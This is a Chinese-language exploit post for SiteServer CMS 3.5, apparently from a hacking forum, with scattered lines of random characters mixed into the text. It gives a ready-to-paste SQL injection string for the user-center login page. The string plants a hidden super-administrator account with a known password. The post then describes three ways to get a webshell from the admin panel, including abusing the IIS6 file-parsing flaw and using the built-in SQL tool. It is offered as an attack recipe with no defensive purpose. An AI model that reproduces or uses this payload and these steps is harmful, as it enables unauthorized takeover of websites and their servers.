SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
3 i2 D1 }8 v; }% h$ l: q
stieserver官网:www.siteserver.cn
; Z0 O" M" h* `& S- a; g8 W! ~7 L
: W/ C/ U3 R1 o6 |: G/ h3 h( T8 T
6 F5 ]* W' a# e$ F
0 G. @0 [9 k8 F, v' M/ h% A+ @EXP:
: n. y1 Z2 q, A+ U% o* Z; r
: s. O0 u' V  ?) s直接访问UserCenter/login.aspx
9 }6 u% \  I$ V- `7 u) i


用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
) I; ~5 w& b4 h5 H# d
2 ~. s9 i3 Q- `* b( W0 b

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

: i6 C9 z" l  q

/ V/ J, u4 s0 H" w: {9 ^之后再访问后台SiteServer/login.aspx用插入的用户登陆

2 F3 _) E$ r$ f! Y! o2 @. E
3 H5 T4 k$ f5 k# o/ p- O7 F! r
后台拿webshell的三种方法：

一、

0 R3 L9 i" [7 p5 O% j( Q站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

4 d% x. y' k2 W! \成员权限-》添加用户-》用户名为：1.asp

( ~3 ~6 G8 {2 x1 h7 K$ f6 K' Jhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
5 s. `5 `2 ?0 v1 r
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

3 ?9 N2 f- C+ h% V, [系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
  u9 Z  s4 h3 Q+ [2 A3 e9 \